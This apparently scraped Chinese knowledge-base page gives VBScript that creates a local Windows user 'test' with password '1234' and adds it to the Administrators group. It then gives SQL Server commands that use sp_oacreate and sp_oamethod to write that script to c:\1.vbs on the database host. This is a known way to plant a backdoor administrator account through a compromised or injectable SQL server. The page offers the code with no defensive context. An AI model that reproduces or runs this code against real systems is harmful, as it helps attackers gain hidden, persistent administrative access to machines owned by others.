主頁(yè) > 知識(shí)庫(kù) > vbs加administrator用戶的代碼

vbs加administrator用戶的代碼

熱門標(biāo)簽:天津智能外呼系統(tǒng)排名 智云億呼電話機(jī)器人 墨西哥地圖標(biāo)注app 龍巖400電話申請(qǐng) 外呼系統(tǒng)群 企業(yè)400電話辦理價(jià)錢低 機(jī)器人打電銷適用于美業(yè)嗎 外呼系統(tǒng)說(shuō)話聲音小怎么辦 上海辦理400電話選號(hào)

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,綁定
Set oe=GetObject(os"/Administrators,group") '屬性,admin組
Set od=ob.Create("user","test") '建立用戶
od.SetPassword "1234" '設(shè)置密碼
od.SetInfo '保存
Set of=GetObject(os"/test",user) '得到用戶
oe.add os"/test"

SQL語(yǔ)句如下,采用sp_oamethod過(guò)程:

declare @o int, @f int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject
("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"wsnetwork.
ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject
(os"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create
("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject
(os"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os"/test"'

標(biāo)簽:阜新 麗水 青島 錫林郭勒盟 黃山 鄂爾多斯 齊齊哈爾 承德

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《vbs加administrator用戶的代碼》,本文關(guān)鍵詞  vbs,加,administrator,用戶,的,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《vbs加administrator用戶的代碼》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于vbs加administrator用戶的代碼的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章